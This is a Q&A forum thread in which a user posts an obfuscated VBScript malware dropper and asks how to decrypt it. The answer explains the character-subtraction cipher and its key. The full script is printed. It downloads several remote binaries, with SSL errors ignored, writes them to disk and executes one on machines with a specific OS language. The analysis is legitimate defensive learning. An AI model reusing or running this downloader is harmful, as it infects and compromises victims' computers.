Decrypt virus - vbscript

4
Option Explicit
On Error Resume Next
dim rbs309
dim tadjakmnmfrg4460
dim icsnvk206
dim wsmp1276
dim falkal1610
dim rfqgobyeyrp5319
dim gtxhgi5556
dim mll8810
dim qxat8709
dim hgurgqrv3280
dim baknqdo6857
dim cioslu3564
dim sndohhjq1214
dim lwwfaim8338
dim haprm493
dim iltkfxbb2382
dim dhydlcp7543
dim qpdu6740
dim gtlbowwr6975
dim xcyi8081
dim isfotb6795
dim uguojbssq5199
dim dycbyrmy5608
dim suqmi6111
dim mojspk6072
dim gwjdvxqxpi1867
dim syc9022
dim cwnilskntu6156
dim jycej9917
dim kaumen4761
dim hpml9179
dim stwjmww5737
dim mju2625
dim idmndh94
dim lkrm5932
dim kfdvhjl9992
dim fyv2635
dim njuv4832
dim ygvhoo991
dim twfygbvnne8124
dim kwjktixh825

kwjktixh825         = "ijn34g"
rbs309              = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))
tadjakmnmfrg4460    = uckp9923(fdhtrhou8434(""))
icsnvk206           = uckp9923(fdhtrhou8434("šÝ›—•ÖÕ"))
wsmp1276            = uckp9923(fdhtrhou8434("ÔÜݪ¨Ì·˜â£Ù̽Å"))
falkal1610          = uckp9923(fdhtrhou8434("ÕÖÓ›‡•ÝÚ×¥—ºÀ"))
rfqgobyeyrp5319     = uckp9923(fdhtrhou8434("Õ×â›b—"))
gtxhgi5556          = uckp9923(fdhtrhou8434("ÐÚØa—"))
mll8810             = uckp9923(fdhtrhou8434("¹º¯X"))
qxat8709            = uckp9923(fdhtrhou8434("Ž«Âtx"))
hgurgqrv3280        = uckp9923(fdhtrhou8434("ÏÓÕa¬"))
baknqdo6857         = uckp9923(fdhtrhou8434("ÖËÓ¥¨º—¬²‚x¨"))
cioslu3564          = uckp9923(fdhtrhou8434("ÝÍÓ–¶ÖÏ⦭ºÎÖ×ybÎ×Óâ£Ù̽"))
sndohhjq1214        = uckp9923(fdhtrhou8434("‰ÝS™ßΘ f¦ÝÜÑÓ¥"))
lwwfaim8338         = uckp9923(fdhtrhou8434("ÍÓ"))
haprm493            = uckp9923(fdhtrhou8434("Õ×â›bÊ"))
iltkfxbb2382        = uckp9923(fdhtrhou8434("Õ×â›b"))
dhydlcp7543         = uckp9923(fdhtrhou8434("š˜£a¨ÚÎßߘ†×ÝÞ¶¡¾—Úâ§|ÕÒÁ"))
qpdu6740            = uckp9923(fdhtrhou8434("™˜Ÿb¦ÌÝÞÓš“àÛËÜœ–"))
kfdvhjl9992         = uckp9923(fdhtrhou8434("ÅÍן–ܹÆᥙھƨv"))
fyv2635             = uckp9923(fdhtrhou8434("ÅÝà˜§¼‰ÖÚtÚÐØק¨Ì¼ŠÒ¡•‡ÜÞܘ¡ÜÌÙ²nª"))
njuv4832            = uckp9923(fdhtrhou8434("Åâ"))
twfygbvnne8124      =  1046
buoyc2863           = uckp9923(fdhtrhou8434("½½½ƒ"))


Function fdhtrhou8434(Str)
str = Replace(str,"@","")
fdhtrhou8434 = str
End Function       

Function uckp9923(Str)
 Dim dxjc2225, mpbx3317, lww1640, ogngfnwbr3141, rbtac94, umr8295, iael1408, lbf7910
 rbtac94    = "" 
 dxjc2225   = Len(kwjktixh825)
 mpbx3317   = 1
 lww1640    = Len(Str) 
 str        = StrReverse(str) 

 For ogngfnwbr3141 = lww1640 To 1 Step -1
      umr8295   = asc(Mid(str,ogngfnwbr3141,1))
      iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
      rbtac94   = rbtac94  &  chr(umr8295 - iael1408)
      lbf7910   = 1
      mpbx3317  = mpbx3317+lbf7910
      lbf7910   = 1

      If mpbx3317 > dxjc2225 Then 
        mpbx3317 = lbf7910
      Next
      rbtac94   = StrReverse(rbtac94)
      uckp9923  = rbtac94 
End Function


gtlbowwr6975    = chr(34)
set xcyi8081    = CreateObject(wsmp1276)
Set isfotb6795  = WScript.CreateObject(falkal1610)
dycbyrmy5608    =  xcyi8081.ComputerName
Set mojspk6072  = CreateObject(cioslu3564)

if mojspk6072.FolderExists(kfdvhjl9992) then 
    uguojbssq5199 = kfdvhjl9992  &  Left(dycbyrmy5608, 3)   &   njuv4832
else
    uguojbssq5199 = fyv2635  &  Left(dycbyrmy5608, 3)  &  njuv4832
end if

suqmi6111       = uguojbssq5199   &  Left(dycbyrmy5608, 3)  &  hgurgqrv3280

Function BinaryGetURL(strURL)
  Dim objWinHttp
  Dim lngTimeout
  Dim strMethod
  Dim strPostData
  Dim strUserAgentString
  Dim intSslErrorIgnoreFlags
  Dim blnEnableRedirects
  Dim blnEnableHttpsToHttpRedirects

  lngTimeout                    = 59000
  strMethod                     = "GET"
  strPostData                   = ""
  intSslErrorIgnoreFlags        = 13056
  blnEnableRedirects            = True
  blnEnableHttpsToHttpRedirects = True
  Set objWinHttp                = CreateObject(dhydlcp7543)
  objWinHttp.SetTimeouts lngTimeout, lngTimeout, lngTimeout, lngTimeout
  objWinHttp.Option(0)          = qpdu6740
  objWinHttp.Option(4)          = intSslErrorIgnoreFlags
  objWinHttp.Option(6)          = blnEnableRedirects
  objWinHttp.Option(12)         = blnEnableHttpsToHttpRedirects
  objWinHttp.Open strMethod, strURL, False 
  If strMethod = "buoyc2863" Then
    objWinHttp.setRequestHeader "Content-type", _ "application/x-www-form-urlencoded"
  End If

  objWinHttp.Send  strPostData 
  If (objWinHttp.Status = 200) Then
    BinaryGetURL = objWinHttp.ResponseBody
  End If
  Set objWinHttp = Nothing
End Function

Function SaveBinaryData(arrByteArray, strFN)
dim ryu9878, vocehkn515
ryu9878 = strFN
vocehkn515 = 2
  If VarType(arrByteArray) >= 8192 Then
    Dim objBS
    Set objBS = CreateObject(baknqdo6857)
    with objBS
        .Type = 1 
        .Open()
        .Write(arrByteArray)
        .SaveToFile ryu9878 , vocehkn515
    End With

  End If 
End Function 
 Set stwjmww5737 = GetObject(uckp9923(fdhtrhou8434("›àÛœ—ÃÝÙÝ¥•ÅÆ°™ÛÊØݦ¦ÌÙ××p ÌßϺ¡£ÐÝËÜ¢§ÙÎÚÛœ¯¡ÜÞÛš¡ÕÒá")))
 Set mju2625 = stwjmww5737.ExecQuery(uckp9923(fdhtrhou8434("ÖÏ⦭ºÐØק•ÙÎÚ½’fš×ÓÅS¡ÖÛÐŽ]TÛÌÏÚ˜‡")))
 For Each idmndh94 in mju2625
lkrm5932 = idmndh94.OSlanguage
 Next
mojspk6072.CreateFolder(uguojbssq5199)
If (mojspk6072.FileExists(uguojbssq5199 & lwwfaim8338) = false and twfygbvnne8124 = lkrm5932) Then
Set gwjdvxqxpi1867 = mojspk6072.OpenTextFile(uguojbssq5199 & lwwfaim8338,8,true,false)
gwjdvxqxpi1867.WriteLine icsnvk206
gwjdvxqxpi1867.Close
Do
SaveBinaryData BinaryGetURL(rbs309 & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "k"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "k") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "o" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "o"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "o") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "e" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "e"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "e") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & haprm493), suqmi6111
Loop Until mojspk6072.FileExists(suqmi6111) = true
isfotb6795.run sndohhjq1214 & gtlbowwr6975 & suqmi6111 & gtlbowwr6975 &  " " & tadjakmnmfrg4460
End If

I received a virus made in vbscript and would like to learn how to decrypt it. I would like to know what steps or subjects I need to study or research to decrypt this. And if there is a site or program that does this, I thank anyone who can help me.

    
asked by anonymous 10.12.2015 / 22:30

1 answer

8

Basically it's a substitute game. I do not want to talk about the whole function, otherwise the answer will be immense (I can change my mind later), but follow the main steps to give you an idea:

You have known parts, just change them until the code is readable.

For example, the fdhtrhou8434 function basically switches @ to nothing, so we can eliminate it from all lines that do not have @. For example

rbs309 = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))

is the same as

rbs309 = uckp9923("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ")

As for the uckp9923 function, it basically runs the end-to-end string, and subtracts the bytes from the string "ijn34g", contained in kwjktixh825

  umr8295   = asc(Mid(str,ogngfnwbr3141,1))
  iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
  rbtac94   = rbtac94  &  chr(umr8295 - iael1408)

If you apply this to shuffled variables, you will get a series of readable strings.

These strings will show you where the Function BinaryGetURL(strURL) function will download some code, which can be malware, for example, and write it to your HD using the SaveBinaryData function.

The code is merely obfuscated, just to give work and its intention not to be visible in the first read, but it is typical technique of script kiddies basically.

Just look at how the code looks much more normal by just changing a few name variables, which can easily be done with a "find and replace" from any code editor:

Function uckp9923(Str)
 resultado      = "" 
 tamanhoChave   = Len( chave )
 iChave         = 1
 tamanhoEntrada = Len(Str) 
 str            = StrReverse(Str) 

 For i = tamanhoEntrada To 1 Step -1
    letraEntrada = Asc( Mid( Str, i, 1 ) )
    letraChave   = Asc( Mid( chave, iChave, 1))
    resultado    = resultado&  chr(letraEntrada - letraChave)
    um = 1
    iChave = iChave + um
    um = 1

    If iChave > tamanhoChave Then 
      iChave = um
    Next
    resultado = StrReverse(resultado)
    uckp9923  = resultado
End Function

It's exactly the same function, I just changed the name of the variables to make it easier to read.

    
10.12.2015 / 23:14